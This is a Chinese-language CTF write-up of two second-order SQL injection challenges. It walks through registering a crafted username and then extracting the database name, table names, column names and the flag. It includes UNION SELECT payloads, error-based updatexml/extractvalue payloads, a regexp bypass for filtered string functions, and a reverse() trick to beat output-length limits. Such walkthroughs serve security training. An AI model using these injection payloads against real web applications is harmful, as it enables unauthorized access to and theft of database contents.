twice_sql_injection

题目

二次注入

用1’注册登录后无info无显示,正常注册info随意修改有显示(回显位置),因此用1’ union select database()#得到库名

image-20240528232421406

接着爆表名,列名,flag

1’ union select group_concat(table_name) from information_schema.tables where table_schema=’ctftraining’#

image-20240528232438309

1’ union select group_concat(column_name) from information_schema.columns where table_schema=’ctftraining’ && table_name=’flag’#

image-20240528232514166

1’ union select group_concat(flag) from ctftraining.flag#

image-20240528232527028

rcctf2015-easysql

题目思路

二次注入

image-20231110120234163

先用admin”注册,登录后修改密码发现报错

image-20231110122144263

双引号闭合,猜测执行语句

select (修改密码) where username=”admin”” and password=’ c4ca4238a0b923820dcc509a6f75849b ‘

因此存在二次注入,用123”||(extractvalue(1,concat(0x7e,database())))#注册得到报错

image-20231110122924541

得到库名,接着爆表名,列名

123”||(updatexml(1,concat(‘~’,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=’web_sqli’))),1))#

image-20231110123045288

123”||(updatexml(1,concat(‘~’,(select(group_concat(column_name))from(information_schema.columns)where(table_name=’users’))),1))#

image-20231110123229865

列名不完全,且mid,left,right函数被过滤,可用正则匹配:字符串 regexp ‘^r’

123”||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name=’users’)&&(column_name)regexp(‘^r’))),1))#

image-20231110124026361

123”||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(‘^f’))),1))#

image-20231110124153344

长度限制,用reverse得到后一部分

image-20231110124325879

逆序得到

image-20231110124436773

拼凑出flag,结束